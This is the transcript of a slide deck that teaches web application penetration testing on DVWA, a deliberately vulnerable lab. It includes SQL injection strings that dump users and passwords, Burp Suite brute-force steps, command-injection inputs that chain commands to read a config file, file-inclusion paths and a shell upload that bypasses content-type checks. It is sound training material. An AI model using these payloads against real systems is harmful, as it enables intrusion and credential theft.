Presentation is loading. Please wait.

Presentation is loading. Please wait.

WEB APPLICATION TESTING

Published byMarjorie Griffith Modified over 6 years ago

Similar presentations

Presentation on theme: "WEB APPLICATION TESTING"— Presentation transcript:

1 WEB APPLICATION TESTING
Web Application Penetration Testing ‘17

2 Web Application Testing
Let’s Play with the security of Web Application & Learn about how bug are found. Through out this, we’ll work on DVWA and related tools.

3 Installing XAMPP XAMPP is used for creating web servers like apache, mysql, etc. Download & Install XAMPP - Start Apache & Mysql services.

4 DVWA DVWA – Damn Vulnerable Web Application.
An intentionally made vulnerable web application which is used for skills development. It contains all the common vulnerabilities which are usually found in web applications. Download -

5 Installing DVWA Open directory where dvwa was downloaded. Unzip DVWA
Move DVWA directory to apache server directory – Open Web browser and direct to – Localhost/<path of dvwa in apache> Ex. Localhost/DVWA

6 Setting up DVWA Database
Initially DVWA will show database error and ask for change in “config.inc.php” file. Open the file by any of editor Change default password and Leave rest of the things same. Now again open web browser and direct to Localhost/DVWA Click on “Create/Update Database” It will redirected to login window, login with DVWA username – admin and password – password .

7 Setting Up DVWA Login to DVWA Select “DVWA Security”
Choose Security Level to “LOW” {for initial testing, then we will increase the level}. There are several types of attacks are present which includes – SQL, XSS, CSRF, Brute Force, File Upload, File Inclusion, Insecure Captcha Etc. Let’s Start Testing ;)

8 DVWA – SQL Injection {Low Level}
SQL Injection is top rated vulnerability which may leads to full sql based database compromise. OWASP SQL Injection Cheat sheet. Click on SQL Injection. It will show USER ID Field, Let’s apply basic Injection – 1’ or ‘1’ = ‘1 1’ or 1 = 1# 1’ or 1 = 1 UNION SELECT NULL, NULL# TABLE_NAME FROM INFORMATION_SCHEMA.TABLES# USER, PASSWORD FROM USERS#

9 SQL Injection {Medium Level}
Set DVWA Security to Medium and Open SQL Injection. Open Burp Suite Proxy and Set Intercept as ON. Check with several queries and forward request each time. Queries – 1’ or 1 = 1# 1’ or 1 = 1 UNION SELECT NULL, NULL# TABLE_NAME FROM INFORMATION_SCHEMA.TABLES# USER, PASSWORD FROM USERS#

10 SQL Injection {High} Set DVWA Security to High and open SQL Injection.
Check source code to see added security features. Apply Queries – 1’ or 1 = 1# 1' OR 1=1 UNION SELECT NULL, table_name from information_schema.tables# 1' OR 1=1 UNION SELECT NULL, table_name from information_schema.columns=users#

11 Brute Force {Low Level}
Open Burp Suite >> Proxy >> Options >> Set Proxy “ :8080” Proxy>>Intercept>>Intercept On Open Firefox >> options >> advanced >> network >> Connection >> setting Manual Proxy Config >> :8080 Open DVWA {LOW} >> Brute Force >> Provide Fake Username & Password. Setting Up Attack – Send to Intruder. Set Attack Type >> Cluster Bomb Add Position to Bruteforce. Set Payloads – admin, administrator, username, password. Add GREP – welcome. Start Attack. Where the length changes, that will be username and password.

12 Command Injection {Low}
Command Line Introduction – Dir – list all the directories. Cd – change the directory. Type - display file content information. Open DVWA{LOW} >> Command Injection. Enter IP – {local host} and view source to understand functionality. Join Two commands using “&, &&, |, || “ etc. Join Commands – <ip> & dir <ip> & dir ..\..\ <ip> & type ..\..\config\config.inc.php <ip> & copy ..\..\config\config.inc.php <new file name>

13 Command Injection {Medium}
Open DVWA{Medium} >> Command Injection. Use OR Operator ( | ). Rest procedure is same.

14 Command Injection {High}
Open DVWA{High} >> Command Injection. Use OR Operator ( | ) without space. Rest procedure is same.

15 File Inclusion It allows an attacker to include a file.
Open DVWA {LOW} >> File Inclusion. Try to Access – Robots.txt Localhost/dvwa/robots.txt Phpinfo.php {root of site} Localhost/dvwa/phpinfo.php Bootmgr {root of drive}

16 File Upload {low} File Extension validation is not set/can be bypassed which gives rise to uploading infected file which in return can infect and lead to total compromising. Open DVWA{low}>> file upload. Try Uploading files with different Extensions. Access uploaded file to >>

17 File Upload {Medium} Open DVWA{Medium}>> file upload.
Turn on Intercept on Burp Suit Try Uploading the shell. Change Content type in Burp suite to “image/png” and forward the request. Access uploaded file to >>

18 THANKS

Download ppt "WEB APPLICATION TESTING"

Similar presentations

WordPress Installation for Beginners Sheila Bergman

WordPress Installation for Beginners Sheila Bergman
Presentation Heading – font Arial

Presentation Heading – font Arial
Hands on Demonstration for Testing Security in Web Applications

Hands on Demonstration for Testing Security in Web Applications
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
©2009 Justin C. Klein Keane PHP Code Auditing Session 3 – Tools of the Trade & Crafting Malicious Input Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 3 – Tools of the Trade & Crafting Malicious Input Justin C. Klein Keane
Copyright © 2004 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.

1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
Install WordPress with Xampp. By www.00397.com With Thanks to: Rupesh Kumar.

Install WordPress with Xampp. By With Thanks to: Rupesh Kumar.
1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.

1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.

The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
SYST 28043 Web Technologies SYST 28043 Web Technologies Installing a Web Server (XAMPP)

SYST Web Technologies SYST Web Technologies Installing a Web Server (XAMPP)
Web-based Document Management System By Group 3 Xinyi Dong Matthew Downs Joshua Ferguson Sriram Gopinath Sayan Kole.

Web-based Document Management System By Group 3 Xinyi Dong Matthew Downs Joshua Ferguson Sriram Gopinath Sayan Kole.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
Microsoft Windows 2003 Server. Client/Server Environment Many client computers connect to a server.

Microsoft Windows 2003 Server. Client/Server Environment Many client computers connect to a server.
Penetration Testing Training Day Capture the Flag Training.

Penetration Testing Training Day Capture the Flag Training.
Session 5: Working with MySQL iNET Academy Open Source Web Development.

Session 5: Working with MySQL iNET Academy Open Source Web Development.

Similar presentations

Ads by Google